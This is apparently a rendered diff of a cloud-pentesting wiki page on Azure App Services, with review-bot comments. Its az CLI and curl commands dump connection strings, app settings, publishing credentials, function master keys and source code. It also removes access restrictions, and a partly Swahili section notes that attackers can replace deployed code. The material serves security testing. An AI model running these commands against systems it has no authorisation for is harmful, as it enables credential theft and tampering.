az webapp auth show --name <app-name> --resource-group <res-group>
# Get access restrictions of an app
az webapp config access-restriction show --name <name> --resource-group <res-group>
# Remove access restrictions
az webapp config access-restriction remove --resource-group <res-group> -n <name> --rule-name <rule-name>
# Get connection strings of a webapp
az webapp config connection-string list --name <name> --resource-group <res-group>
# Get appsettings of an app
az webapp config appsettings list --name <name> --resource-group <res-group>
# Get SCM and FTP credentials
az webapp deployment list-publishing-profiles --name <name> --resource-group <res-group>
# Get configured Auth information
az webapp auth show --name <app-name> --resource-group <res-group>
# Get backups of a webapp
az webapp config backup list --webapp-name <name> --resource-group <res-group>
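Review bot: `az webapp config access-restriction remove --resource-group <res-group> -n <name> --rule-name <rule-name>` under `# Remove access restrictions` is a state-changing command inside a block headed Enumeration; move it out of the read-only listing or mark it clearly as modifying the target. `az webapp auth show` is listed twice in this hunk with the same `# Get configured Auth information` comment, and the placeholders alternate between `<name>` and `<app-name>`; after the reorder keep one copy and one placeholder style.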
@@ -75,61 +133,39 @@ az webapp config snapshot list --resource-group <res-group> -n <name>
# Restore snapshot
az webapp config snapshot restore -g <res-group> -n <name> --time 2018-12-11T23:34:16.8388367
# Get connection strings of a webapp
az webapp config connection-string list --name <name> --resource-group <res-group>
# Get slots
az webapp deployment slot list --name <AppName> --resource-group <ResourceGroupName> --output table
az webapp show --slot <SlotName> --name <AppName> --resource-group <ResourceGroupName>
# Get traffic-routing
az webapp traffic-routing show --name <AppName> --resource-group <ResourceGroupName>
# Get used container by the app
az webapp config container show --name <name> --resource-group <res-group>
# Get storage account configurations of a webapp
az webapp config storage-account list --name <name> --resource-gl_group
az webapp config storage-account list --name <name> --resource-group <res-group>
# Get configured container (if any) in the webapp, it could contain credentials
az webapp config container show --name <name> --resource-group <res-group>
# Get Webjobs
az webapp webjob continuous list --resource-group <res-group> --name <app-name>
az webapp webjob triggered list --resource-group <res-group> --name <app-name>
# Read webjobs logs with Azure permissions
az rest --method GET --url "<SCM-URL>/vfs/data/jobs/<continuous | triggered>/rev5/job_log.txt" --resource "https://management.azure.com/"
az rest --method GET --url "https://lol-b5fyaeceh4e9dce0.scm.canadacentral-01.azurewebsites.net/vfs/data/jobs/continuous/rev5/job_log.txt" --resource "https://management.azure.com/"
# List all the functions
az functionapp list
# Read webjobs logs with SCM credentials
curl "https://windowsapptesting-ckbrg3f0hyc8fkgp.scm.canadacentral-01.azurewebsites.net/vfs/data/jobs/continuous/lala/job_log.txt" \
--user '<username>:<password>' -v
# Get info of 1 funciton (although in the list you already get this info)
az functionapp show --name <app-name> --resource-group <res-group>
## If "linuxFxVersion" has something like: "DOCKER|mcr.microsoft.com/..."
## This is using a container
# Get connections of a webapp
az webapp conection list --name <name> --resource-group <res-group>
# Get details about the source of the function code
az functionapp deployment source show \
--name <app-name> \
--resource-group <res-group>
## If error like "This is currently not supported."
## Then, this is probalby using a container
# Get more info if a container is being used
az functionapp config container show \
--name <name> \
--resource-group <res-group>
# Get settings (and privesc to the sorage account)
az functionapp config appsettings list --name <app-name> --resource-group <res-group>
# Check if a domain was assigned to a function app
az functionapp config hostname list --webapp-name <app-name> --resource-group <res-group>
# Get SSL certificates
az functionapp config ssl list --resource-group <res-group>
# Get network restrictions
az functionapp config access-restriction show --name <app-name> --resource-group <res-group>
# Get more info about a function (invoke_url_template is the URL to invoke and script_href allows to see the code)
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions?api-version=2024-04-01"
# Get source code with Master Key of the function
curl "<script_href>?code=<master-key>"
## Python example
curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=<master-key>" -v
# Get source code
az rest --url "https://management.azure.com/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
# Get hybrid-connections of a webapp
az webapp hybrid-connections list --name <name> --resource-group <res-group>
```
{{#endtab }}
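Review bot: The Webjobs log examples hard-code `rev5` as the job name and use real-looking hosts (`lol-b5fyaeceh4e9dce0.scm...`, `windowsapptesting-ckbrg3f0hyc8fkgp.scm...`, job `lala`) next to the placeholder form `<SCM-URL>/vfs/data/jobs/<continuous | triggered>/...`; use placeholders throughout so the listing does not point at live tenants. `az webapp conection list` misspells `connection`, and `az webapp config snapshot restore` is another modifying command in the enumeration block. This rendered view has lost its +/- markers, so check which of these lines are on the added side before fixing; the change from `--resource-gl_group` to `--resource-group <res-group>` is correct.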
@@ -196,6 +232,40 @@ git clone 'https://<username>:<password>@name.scm.azurewebsites.net/repo-name.gi
../az-privilege-escalation/az-app-services-privesc.md
{{#endref}}
## Mifanozo ya kuunda Web Apps
### Python kutoka kwa eneo
Hii tutorial inategemea ile kutoka [https://learn.microsoft.com/en-us/azure/app-service/quickstart-python](https://learn.microsoft.com/en-us/azure/app-service/quickstart-python?tabs=flask%2Cwindows%2Cazure-cli%2Cazure-cli-deploy%2Cdeploy-instructions-azportal%2Cterminal-bash%2Cdeploy-instructions-zip-azcli).
```bash
# Clone repository
git clone https://github.com/Azure-Samples/msdocs-python-flask-webapp-quickstart
cd msdocs-python-flask-webapp-quickstart
# Create webapp from this code
az webapp up --runtime PYTHON:3.9 --sku B1 --logs
```
Kuingia kwenye lango la SCM au kuingia kupitia FTP inawezekana kuona katika `/wwwroot` faili iliyo na muundo `output.tar.gz` ambayo ina msimbo wa webapp.
> [!TIP]
> Kuungana tu kupitia FTP na kubadilisha faili `output.tar.gz` haitoshi kubadilisha msimbo unaotekelezwa na webapp.
**Mshambuliaji anaweza kupakua faili hii, kuibadilisha, na kuipakia tena ili kutekeleza msimbo wowote katika webapp.**
### Python kutoka Github
Mafunzo haya yanategemea yale ya awali lakini yanatumia hazina ya Github.
1. Fork hazina msdocs-python-flask-webapp-quickstart katika akaunti yako ya Github.
2. Unda Web App mpya ya python katika Azure.
3. Katika `Deployment Center` badilisha chanzo, ingia na Github, chagua hazina iliyoforked na bonyeza `Save`.
Kama katika kesi ya awali, kuingia kwenye lango la SCM au kuingia kupitia FTP inawezekana kuona katika `/wwwroot` faili iliyo na muundo `output.tar.gz` ambayo ina msimbo wa webapp.
> [!TIP]
> Kuungana tu kupitia FTP na kubadilisha faili `output.tar.gz` na kuanzisha tena uanzishaji haitoshi kubadilisha msimbo unaotekelezwa na webapp.
## Marejeleo
- [https://learn.microsoft.com/en-in/azure/app-service/overview](https://learn.microsoft.com/en-in/azure/app-service/overview)
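Review bot: The `[!TIP]` under `### Python kutoka kwa eneo` says that replacing `output.tar.gz` over FTP is not enough to change the code the webapp runs, but the bold sentence directly after it says the file can be downloaded, modified and re-uploaded to run arbitrary code in the webapp. The two statements contradict each other; check the source page and keep the one it intends. Smaller points: `## Mifanozo ya kuunda Web Apps` looks like a typo for `Mifano`, and `Hii tutorial` and `hazina iliyoforked` are left half-translated.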